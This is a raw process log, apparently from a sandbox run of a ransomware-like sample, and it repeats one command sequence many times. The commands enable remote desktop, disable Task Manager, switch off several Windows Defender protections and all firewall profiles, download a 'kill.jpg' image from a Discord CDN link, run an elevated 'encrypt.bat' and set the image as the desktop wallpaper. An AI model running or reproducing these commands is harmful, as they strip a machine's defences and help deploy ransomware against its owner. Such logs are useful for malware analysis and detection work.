RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4700 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

